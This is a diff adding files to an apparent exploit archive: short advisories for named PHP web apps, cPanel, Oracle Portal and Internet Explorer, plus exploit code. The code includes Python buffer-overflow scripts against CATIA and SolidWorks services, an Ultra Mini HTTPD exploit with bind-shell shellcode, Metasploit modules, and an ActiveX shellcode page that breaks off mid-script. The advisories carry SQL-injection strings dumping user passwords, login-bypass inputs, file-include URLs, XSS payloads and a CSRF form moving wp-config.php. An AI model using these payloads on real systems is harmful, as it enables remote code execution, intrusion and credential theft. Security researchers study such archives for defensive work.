+      fail_with(Failure::BadConfig, "Unsupported file extension: #{file_name}")
+    end
+
+    print_status("Sending payload request...")
+    r = send_request_cgi({
+      'uri' => normalize_uri(uri, 'thumb.php'),
+      'vars_get' => vars_get
+    }, 1)
+
+    if r && r.code == 404 && r.body =~ /not exist/
+      print_error("File: #{file_name} does not exist.")
+    elsif r
+      print_error("Received response #{r.code}, exploit probably failed.")
+    end
+  end
+
+  # The order of name, value keeps shifting so regex is painful.
+  # Cant use nokogiri due to security issues
+  # Cant use REXML directly as its not strict XHTML
+  # So we do a filthy mixture of regex and REXML
+  def get_html_value(html, type, name, value)
+    return nil unless html
+    return nil unless type
+    return nil unless name
+    return nil unless value
+
+    found = nil
+    html.each_line do |line|
+      if line =~ /(<#{type}[^\/]*name="#{name}".*?\/>)/i
+        found = $&
+        break
+      end
+    end
+
+    if found
+      doc = REXML::Document.new found
+      return doc.root.attributes[value]
+    end
+
+    ''
+  end
+end

platforms/multiple/remote/31770.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29119/info
+
+Oracle Application Server Portal is prone to a authentication-bypass vulnerability because the application fails to properly restrict access to certain resources.
+
+An attacker can exploit this vulnerability to bypass certain security restrictions and gain access to potentially sensitive contents of the portal.
+
+Oracle Application Server Portal 10g is vulnerable to this issue; other versions may also be affected.
+
+Visiting the 'http://www.example.com/portal/%0A' site will create a cookie sufficient to trigger the issue and access 'http://www.example.com/dav_portal/porta/' without authorization.
+

platforms/php/webapps/31768.txt

@@ -0,0 +1,143 @@
+Details
+================
+Software: BP Group Documents
+Version: 1.2.1
+Homepage: http://wordpress.org/plugins/bp-group-documents/
+CVSS: 8 (High; AV:N/AC:L/Au:S/C:P/I:P/A:C)
+
+
+Description
+================
+Stored XSS vulnerability in BP Group Documents 1.2.1
+
+Vulnerability
+================
+“Display name” and “Description” fields are not escaped, meaning any 
+tags including script tags can be stored in them.
+
+Proof of concept
+================
+Go to the upload form, select a document to upload, set the “Display 
+name” to “photograph of a cute puppy<scriptalert(‘xss’)</script” and 
+set the “Description” to “this is an innocuous 
+description<scriptalert(‘xss again’)</script”.
+
+Mitigations
+================
+Update to version 1.2.2.
+
+Timeline
+================
+
+2013-09-26: Discovered
+2013-09-30: Reported to plugins@wordpress.org
+2013-10-04: Fix released (1.2.2)
+
+
+Discovered by:
+================
+Tom Adams
+
+
+Second one:
+https://security.dxw.com/advisories/csrf-vulnerability-in-bp-group-documents-1-2-1/
+Details
+================
+Software: BP Group Documents
+Version: 1.2.1
+Homepage: http://wordpress.org/plugins/bp-group-documents/
+CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:N/I:P/A:N)
+
+
+Description
+================
+CSRF vulnerability in BP Group Documents 1.2.1
+
+Vulnerability
+================
+An unauthenticated user can cause a logged in user to edit the name 
+and description of any existing group document. The fields are also 
+vulnerable to XSS.
+
+Proof of concept
+================
+Assume we have a group with slug “x” and a group document with id 8:
+<form method="POST" action="https://wp.ayumu/groups/x/documents/"
+<input type="text" name="bp_group_documents_operation" value="edit"
+<input type="text" name="bp_group_documents_id" value="8"
+<input type="text" name="bp_group_documents_name" 
+value="<scriptalert(1)</script"
+<input type="text" name="bp_group_documents_description" value="abc"
+<input type="submit"
+</form
+
+Mitigations
+================
+Update to version 1.2.2.
+
+Timeline
+================
+
+2013-09-26: Discovered
+2013-09-30: Reported to plugins@wordpress.org
+2013-10-04: Fix released (1.2.2)
+
+
+Discovered by:
+================
+Tom Adams 
+
+Third one:
+https://security.dxw.com/advisories/moving-any-file-php-user-has-access-to-in-bp-group-documents-1-2-1/
+Details
+================
+Software: BP Group Documents
+Version: 1.2.1
+Homepage: http://wordpress.org/plugins/bp-group-documents/
+CVSS: 9 (High; AV:N/AC:L/Au:N/C:P/I:P/A:C)
+
+
+Description
+================
+Moving any file PHP user has access to in BP Group Documents 1.2.1
+
+Vulnerability
+================
+An admin user (or anybody, since there is a CSRF vulnerability in this 
+form) can move any file the PHP user has access to to a location 
+inside the uploads directory. From the uploads directory, they are 
+likely to be able to read the file.
+
+Proof of concept
+================
+As a logged in admin, visit a page containing this form and submit it 
+(or add auto-submission, and cause a logged in admin to visit it):
+<form method="POST" 
+action="http://localhost/wp-admin/options-general.php?page=bp-group-documents-settings"
+<input name="group" value="1"
+<input name="file" value="../../../../wp-config.php"
+<input type="submit"
+</form
+This will cause the wp-config.php file to be moved to a location 
+within wp-content/uploads. In my case it was 
+wp-content/uploads/group-documents/1/1380203685-……..wp-config.php. In 
+this example I broke a WordPress installation, leaving the site wide 
+open to another person to come in and do the “famous five minute 
+install”. There may also be handy config files laying around that you 
+could read by moving them to the web root.
+
+Mitigations
+================
+Update to version 1.2.2.
+
+Timeline
+================
+
+2013-09-26: Discovered
+2013-09-30: Reported to plugins@wordpress.org
+2013-10-04: Fix released (1.2.2)
+
+
+Discovered by:
+================
+Tom Adams 

platforms/php/webapps/31771.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29125/info
+
+cPanel is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/scripts2/knowlegebase?issue=[INJECTION]&domain=

platforms/php/webapps/31772.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29125/info
+ 
+cPanel is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+ 
+http://www.example.com/scripts2/changeip?domain=any&user=[INJECTION]

platforms/php/webapps/31773.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29125/info
+  
+cPanel is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+  
+http://www.example.com/scripts2/listaccts?searchtype=domain&search=[INJECTION]&acctp=30 

platforms/php/webapps/31774.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29133/info
+
+BlogPHP is prone to multiple input-validation vulnerabilities, including a cross-site scripting issue, an HTML-injection issue, and a cookie-manipulation issue.
+
+Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, and gain access as an arbitrary user.
+
+BlogPHP 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?act=sendmessage&user=admin[XSS] 

platforms/php/webapps/31775.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29139/info
+
+OtherLogic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/vocourse.php?id=[SQL Injection] 

platforms/php/webapps/31776.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/29148/info
+
+The WordPress WP Photo Album (WPPA) plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/photos/?album=1&photo=-11111+union+select+concat(user_login,char(45),user_pass)+from+wp_users--
+http://www.example.com/?page_id=[gallerypage]&album=10&photo=-16+union+select+concat(user_login,char(45),user_pass)+from+wp_users-- 

platforms/php/webapps/31777.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29151/info
+
+AJ Classifieds is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The issue affects AJ Classifieds 2008; other versions may also be vulnerable.
+
+http://www.example.com/index.php?do=details_posting&cat_id=5&posting_id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,CONCAT(0x3C666F6E7420636F6C6F723D22726564223E,user_name,char(58),password,0x3C2F666F6E743E),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/**/FROM/**/admin_users/**/LIMIT/**/0,1/*
+
+

platforms/php/webapps/31778.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29152/info
+
+phpInstantGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/phpInstantGallery/index.php?gallery=[XSS] 

platforms/php/webapps/31779.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/29152/info
+ 
+phpInstantGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/phpInstantGallery/image.php?gallery=1&imgnum=[XSS]
+http://www.example.com/phpInstantGallery/image.php?gallery=[XSS]

platforms/php/webapps/31780.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29153/info
+
+CyrixMED is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+CyrixMED 1.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/CyrixMed_v1.4/index.php?msg_erreur=[XSS] 

platforms/php/webapps/31781.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/29159/info
+
+IBD Micro CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Micro CMS 3.5 is vulnerable; other versions may also be affected. 
+
+Username: " or "1" = "1
+Password: ") or "1" = "1" or PASSWORD("
+
+Username: valid_username/* [eg. admin/*]
+Password: learn3r [or whatever]
+
+Or Username: " or 1=1/*
+Password: learn3r [or whatever] 

platforms/php/webapps/31782.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29162/info
+
+Claroline is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow a remote attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Claroline 1.7.5 is affected; other versions may also be vulnerable.
+
+http://www.example.com/[PaTh]/claroline/inc/lib/export_exe_tracking.class.php?clarolineRepositoryAppend=[Ev!l]
+http://www.example.com/[PaTh]/claroline/inc/lib/event/init_event_manager.inc.php?includePath=[Ev!l] 

platforms/php/webapps/31783.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29163/info
+
+Fusebox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Fusebox 5.5.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[PaTh]/fusebox5.php?FUSEBOX_APPLICATION_PATH=[EV!L] 

platforms/php/webapps/31784.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29164/info
+
+PhpMyAgenda is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+PhpMyAgenda 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[PaTh]/infoevent.php3?rootagenda=[EV!L] 

platforms/php/webapps/31787.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29205/info
+
+Automated Link Exchange Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/linking.page.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10
+
+http://www.example.com/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
+

platforms/windows/dos/31762.py

@@ -0,0 +1,120 @@
+'''
+# Exploit Title: Dassault Systemes Catia V5-6R2013 "CATV5_AllApplications" Stack Buffer Overflow
+# Date: 2-18-2014
+# Exploit Author: Mohamed Shetta
+Email: mshetta |at| live |dot| com
+# Vendor Homepage: http://www.3ds.com/products-services/catia/portfolio/catia-v5/latest-release/
+# Tested on: Windows 7 & Windows XP
+#Vulnerability type: Remote Code Execution
+#Vulnerable file: CATSysDemon.exe
+#PORT: 55558 Or 55555
+
+---------------------------------------------------------------------------------------------------------
+Software Description:
+
+CATIA
+developed by Dassault Systemes (3DS) is the world leading integrated 
+suite of Computer Aided Design (CAD), Engineering (CAE) and 
+Manufacturing (CAM) applications for digital product definition and 
+lifecycle management. CATIA is widely used in aerospace, automotive, 
+shipbuilding, energy and many other industries. CATIA Composites Design 
+is a workbench in CATIA supporting composites design, engineering and 
+manufacture of complex 3D composites parts containing up to thousands of
+plies each. Specific developments by Dassault Systemes allow the 
+transfer of the composites model and determination of anisotropic 
+material properties from the constantly-chaging fiber orientations and 
+ply thicknesses within realistic 3D industrial components. These varying
+material properties in the component have to be used by numerical codes
+such as ACEL-NDT and the FE solver based on XLIFE++ for accurate 
+analyses of these parts (note that trivial composites components like 
+flat panels can be analysed by the numerical codes independently).
+
+
+---------------------------------------------------------------------------------------------------------
+Vulnerability Details:
+
+A stack buffer overflow occurs when copying a user supplied input to a stack buffer of user supplied size.
+An overflow occurs when the user supplies a small size leading to overwrite the return address, However this behavior can't be exploited as another important pointers are overwritten too that affect the flow of the application causing the application to crash before reaching the RET instruction.
+By exploiting memcpy, this vulnerability can be exploited and causes Remote Code Execution.
+
+The vulnerable procedure starts at 004042D0.
+Below is a summarize of what this procedure do.
+-At 00404309 a stack memory allocation function is called with a user supplied parameter.
+This function works as follows, It allocates memory in chunks of 0xF bytes and the current esp is considered a part of a current chunk. For clarification here is an example with values.
+Lets say the ESP was pointing to 0018A468 just before entering the memalloc function (00404309) and a user supplied parameter of 7. The function will return ESP that points to 0018A460 this means that the function allocated 8 bytes another case with a user supplied parameter of 8 the function returns with esp that points to 0018A460 again with user supplied parameter of 9 and the function returns with esp that points to 0018A450 with 0x18 byte allocated if the user supplied parameter of value ranges from 0x9 to 0x18 the function will return the same ESP pointer as it's still in the same chunk of 0xF.
+
+Concluded from this behavior, If the least significant number from ESP at EIP of 0x00404309 changed, the required number of bytes to overwrite the return address will change.This case will happens for different operating systems, Windows 7 will end with 8 and windows XP will end with 0 AS TESTED. 
+
+00404314 |. B9 2A000000 MOV ECX,2A
+00404319 |. 8BFB MOV EDI,EBX
+0040431B |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
+0040431D |. 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
+00404320 |. 0FB74F 02 MOVZX ECX,WORD PTR DS:[EDI+2]
+00404324 |. 51 PUSH ECX ; /NetShort
+
+The procedure then copies a 0x2A*4 bytes of user supplied buffer to the allocated stack memory, Afterward it gets a pointer from the stack, and that's what made the vulnerability not exploitable without the memcpy function as if we set the stack memory allocation size for small value just to overwrite the return address we will overwrite this pointer which is just above the return address causing the application to crash.
+So to solve this we will use the memcpy function to write the return address. A decent memory allocation size will be supplied which is 0x9A by that size neither of the pointer nor the return address will be overwritten.
+0040432A |. 8B75 FC MOV ESI,DWORD PTR SS:[EBP-4]
+Loads the size parameter for the memcpy function which was over written by the user to be just 8 to prevent further corruption for the application memory( Windows 7 case ).
+Then memcpy is executed, overwriting the Return address with a user supplied one.
+
+Other trivial adjustments were made so that the exploit works on Windows XP and 7. 
+
+----------------------------------------------------------------------------------------------------------
+Registers Dumb:
+
+EAX 00000000
+ECX 00000000
+EDX 0018A2F8
+EBX 00000000
+ESP 0018A480
+EBP 00000002
+ESI 01000000
+EDI B0000000
+EIP 90909090
+C 1 ES 002B 32bit 0(FFFFFFFF)
+P 0 CS 0023 32bit 0(FFFFFFFF)
+A 1 SS 002B 32bit 0(FFFFFFFF)
+Z 0 DS 002B 32bit 0(FFFFFFFF)
+S 1 FS 0053 32bit FFFDD000(FFF)
+T 0 GS 002B 32bit 0(FFFFFFFF)
+D 0
+O 0
+EFL 00000293 (NO,B,NE,BE,S,PO,L,LE)
+ST0 empty 0.0
+ST1 empty 0.0
+ST2 empty 0.0
+ST3 empty 0.0
+ST4 empty 0.0
+ST5 empty 0.0
+ST6 empty 0.0
+ST7 empty 0.0
+3 2 1 0 E S P U O Z D I
+FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
+FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
+
+------------------------------------------------------------------------------------------------------------
+Disclosure timeline:
+
+12/15/2013 - Vendor notified and no response.
+2/18/2014 - Public disclosure
+'''
+
+#!/usr/bin/env python
+  
+import socket
+import struct
+import ctypes
+
+RetAdd="\x90\x90\x90\x90"
+Shell="S" *1000
+buff= "\x00\x01\x00\x30" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "\x00" * 48 + "CATV5_Backbone_Bus" +"\x00" + "\x00"* 49 + "\x00\x00\x00\x00"
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("192.168.0.3", 55555))
+#s.connect(("192.168.0.5", 55558))
+s.send(struct.pack('>I',len(buff) ))
+s.send(buff)
+buff= "\x02\x00\x00\x00" + RetAdd*3 + "\x00\x00\x00\x00" * 13 + "\x00\x00\x00\x00" * 5 + "CATV5_AllApplications" +"\x00" + "\x00"* 43 +"\x00\x00\x98" + "\x00\x00\x00\x01" +"\x00"*4 +"\x08\x00\x00\x00" + Shell                                   
+s.send(struct.pack('>I',len(buff) ))
+s.send(buff)
+

platforms/windows/dos/31763.py

@@ -0,0 +1,69 @@
+'''
+# Exploit Title: SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 Remote Code Execution Vulnerability
+# Date: 2-18-2014
+# Author: Mohamed Shetta
+Email: mshetta |at| live |dot| com
+# Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm
+# Tested on: Windows 7
+#Vulnerability type: Remote Code Execution
+#Vulnerable file: pdmwService.exe
+#PORT: 30000
+
+
+---------------------------------------------------------------------------------------------------------
+Software Description:
+
+SolidWorks Workgroup PDM is a PDM tool that allows SolidWorks users operating in teams of 10 members or less to work on designs concurrently. With SolidWorks PDM Workgroup, designers can search, revise, and vault CAD data while maintaining an accurate design history.
+
+
+---------------------------------------------------------------------------------------------------------
+Vulnerability Details:
+
+A stack buffer overflow occurs when copying a user supplied input to a fixed size stack buffer without boundary check leading to overwrite the SEH and the return address.
+The copying procedure stops when a null word is found and no size check is proceeded.
+
+
+-----------------------------------------------------------------------------------------------------------
+Vulnerable Code:
+EAX contains the User supplied data.
+
+004E0C50 |> /0FB708 /MOVZX ECX,WORD PTR DS:[EAX] ; Copying To Fixed Size Buffer
+004E0C53 |. |66:890C02 |MOV WORD PTR DS:[EDX+EAX],CX
+004E0C57 |. |83C0 02 |ADD EAX,2
+004E0C5A |. |66:85C9 |TEST CX,CX
+004E0C5D |.^\75 F1 \JNZ SHORT 004E0C50 ; pdmwServ.004E0C50
+
+
+------------------------------------------------------------------------------------------------------------
+PoC:
+
+The PoC attacks both the SEH and Return address, overwriting them with 0x00401000.
+To demonstrate the vulnerability easily SEH will be used to take control of EIP.
+
+The exception will be triggered by 0x004B9CB6 Because another read attempt is made that fails because of read time out error. This behavior is intended by the attacker to trigger the exception.
+
+------------------------------------------------------------------------------------------------------------
+Further attack vectors:
+
+Opcodes 2002 and 2003 are vulnerable too.
+
+------------------------------------------------------------------------------------------------------------
+Disclosure timeline:
+
+12/15/2013 - Vendor notified and no response.
+2/18/2014 - Public disclosure
+'''
+
+#!/usr/bin/env python
+  
+import socket
+
+Shell="A"*2060
+EIP="\x00\x10\x40\x00"
+buff="\xD1\x07\x00\x00" + "\x1C\x08\x00\x00" + Shell + EIP + "\x90\x90\x90\x90\x90\x90\x90\x90" + EIP
+          #OpCode                        Size of the next data                                   Junk
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("192.168.0.3", 30000))
+s.send(buff)
+
+

platforms/windows/local/31766.rb

@@ -0,0 +1,62 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Audiotran PLS File Stack Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.
+        An attacker must send the file to victim and the victim must open the file.
+        Alternatively, it may be possible to execute code remotely via an embedded
+        PLS file within a browser when the PLS extention is registered to Audiotran.
+        This alternate vector has not been tested and cannot be exercised directly
+        with this module.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'    =>
+        [
+          'Philip OKeefe',
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '14961' ]
+        ],
+      'Payload'        =>
+        {
+          'Space'    => 5000,
+          'BadChars' => "\x00\x0a\x0d\x3d",
+          'StackAdjustment' => -3500,
+        },
+      'Platform' => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows Universal', { 'Ret' => 0x1001cd67 } ], #p/p/r from amp3dj.ocx
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Sep 09 2010',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('FILENAME', [ true, 'The file name.',  'msf.pls']),
+        ], self.class)
+  end
+
+  def exploit
+    sploit = "[playlist]\r\nFile1="
+    sploit << rand_text_alpha_upper(1940)
+    sploit << generate_seh_payload(target.ret)
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(sploit)
+  end
+end

platforms/windows/remote/31736.py

@@ -0,0 +1,52 @@
+# Exploit Title: Ultra Mini HTTPD stack buffer overflow POST request
+# Date: 16 Feb 2014
+# Exploit Author: Sumit
+# Vendor Homepage: http://www.picolix.jp/
+# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
+# Version: 1.21
+# Tested on: Windows XP Professional SP3
+#
+# Description:
+# A buffer overflow is triggered when requesting a very long url in POST request
+#
+
+import socket
+
+shellcode = ( # msfvenom windows/shell_bind_tcp -b '\x00\x09\x0a\x0b\x0c\x0d\x20'
+"\xd9\xea\xba\x03\xc9\x19\xa6\xd9\x74\x24\xf4\x58\x29\xc9" +
+"\xb1\x56\x31\x50\x18\x83\xe8\xfc\x03\x50\x17\x2b\xec\x5a" +
+"\xff\x22\x0f\xa3\xff\x54\x99\x46\xce\x46\xfd\x03\x62\x57" +
+"\x75\x41\x8e\x1c\xdb\x72\x05\x50\xf4\x75\xae\xdf\x22\xbb" +
+"\x2f\xee\xea\x17\xf3\x70\x97\x65\x27\x53\xa6\xa5\x3a\x92" +
+"\xef\xd8\xb4\xc6\xb8\x97\x66\xf7\xcd\xea\xba\xf6\x01\x61" +
+"\x82\x80\x24\xb6\x76\x3b\x26\xe7\x26\x30\x60\x1f\x4d\x1e" +
+"\x51\x1e\x82\x7c\xad\x69\xaf\xb7\x45\x68\x79\x86\xa6\x5a" +
+"\x45\x45\x99\x52\x48\x97\xdd\x55\xb2\xe2\x15\xa6\x4f\xf5" +
+"\xed\xd4\x8b\x70\xf0\x7f\x58\x22\xd0\x7e\x8d\xb5\x93\x8d" +
+"\x7a\xb1\xfc\x91\x7d\x16\x77\xad\xf6\x99\x58\x27\x4c\xbe" +
+"\x7c\x63\x17\xdf\x25\xc9\xf6\xe0\x36\xb5\xa7\x44\x3c\x54" +
+"\xbc\xff\x1f\x31\x71\x32\xa0\xc1\x1d\x45\xd3\xf3\x82\xfd" +
+"\x7b\xb8\x4b\xd8\x7c\xbf\x66\x9c\x13\x3e\x88\xdd\x3a\x85" +
+"\xdc\x8d\x54\x2c\x5c\x46\xa5\xd1\x89\xc9\xf5\x7d\x61\xaa" +
+"\xa5\x3d\xd1\x42\xac\xb1\x0e\x72\xcf\x1b\x39\xb4\x01\x7f" +
+"\x6a\x53\x60\x7f\x9d\xff\xed\x99\xf7\xef\xbb\x32\x6f\xd2" +
+"\x9f\x8a\x08\x2d\xca\xa6\x81\xb9\x42\xa1\x15\xc5\x52\xe7" +
+"\x36\x6a\xfa\x60\xcc\x60\x3f\x90\xd3\xac\x17\xdb\xec\x27" +
+"\xed\xb5\xbf\xd6\xf2\x9f\x57\x7a\x60\x44\xa7\xf5\x99\xd3" +
+"\xf0\x52\x6f\x2a\x94\x4e\xd6\x84\x8a\x92\x8e\xef\x0e\x49" +
+"\x73\xf1\x8f\x1c\xcf\xd5\x9f\xd8\xd0\x51\xcb\xb4\x86\x0f" +
+"\xa5\x72\x71\xfe\x1f\x2d\x2e\xa8\xf7\xa8\x1c\x6b\x81\xb4" +
+"\x48\x1d\x6d\x04\x25\x58\x92\xa9\xa1\x6c\xeb\xd7\x51\x92" +
+"\x26\x5c\x61\xd9\x6a\xf5\xea\x84\xff\x47\x77\x37\x2a\x8b" +
+"\x8e\xb4\xde\x74\x75\xa4\xab\x71\x31\x62\x40\x08\x2a\x07" +
+"\x66\xbf\x4b\x02" )
+
+EIP = '\x53\x93\x42\x7E' # 7E429353 JMP ESP user.dll
+payload = 'A'* 5438 + EIP + '\x90'*50 + shellcode
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("127.0.0.1", 80))
+buf = "POST / %s HTTP/1.1\r\nHost:127.0.0.1\r\n\r\n" % (payload)
+
+s.send(buf)
+s.close()

platforms/windows/remote/31759.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/29112/info
+
+Microsoft Internet Explorer is prone to a weakness that can facilitate cross-site scripting attacks. The issue occurs because the application fails to sufficiently sanitize user-supplied input when handling UTF-7 charset data received in HTTP responses.
+
+Attackers can leverage this weakness to aid in cross-site scripting attacks against unsuspecting users of the application.
+
+Reports indicate that all versions of Internet Explorer are affected.
+
+Other browsers may also be affected under certain configurations, but this has not been confirmed.
+
+NOTE: This BID was originally titled 'Apache HTTP Server 403 Error Cross-Site Scripting Vulnerability'.
+
+http://www.example.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9 idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('xss') +ADw-/script+AD4---//-- 

platforms/windows/remote/31769.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29118/info
+
+Ourgame 'GLIEDown2.dll' ActiveX control is prone to a remote code-execution vulnerability because it fails to sufficiently verify user-supplied input.
+
+An attacker can exploit this issue to run arbitrary attacker-supplied code in the context of the currently logged-in user. Failed exploits attempts will trigger denial-of-service conditions.
+
+Note that GlobalLink 2.8.1.2 beta is also affected by this issue. 
+
+<script> document.writeln("<html>"); document.writeln("<object classid=\"clsid:F917534D-535B-416B-8E8F-0C04756C31A8\" id=\'target\'><\/object>"); document.writeln("<body>"); document.writeln("<SCRIPT language=\"JavaScript\">"); document.writeln("var cikeqq575562708 = \"%u9090%u6090\" +"); document.writeln("\"%u17eb%u645e%u30a1%u0000\" +"); document.writeln("\"%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%ue8e0\" +"); document.writeln("\"%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad\" +"); document.writeln("\"%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503\" +"); document.writeln("\"%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d\" +"); document.writeln("\"%u6856%ufe98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e\" +"); document.writeln("\"%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1%ub8e5%u95e8\" +"); document.writeln("\"%u0000%u8900%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900\" +"); document.writeln("\"%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845%u6856\" +"); document.writeln("\"%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900\" +"); document.writeln("\"%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00\" +"); document.writeln("\"%u285d%uff53%u0455%u6850%u1a36%u702f%u3fe8%u0000%u8900\" +"); document.writeln("\"%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e\" +"); 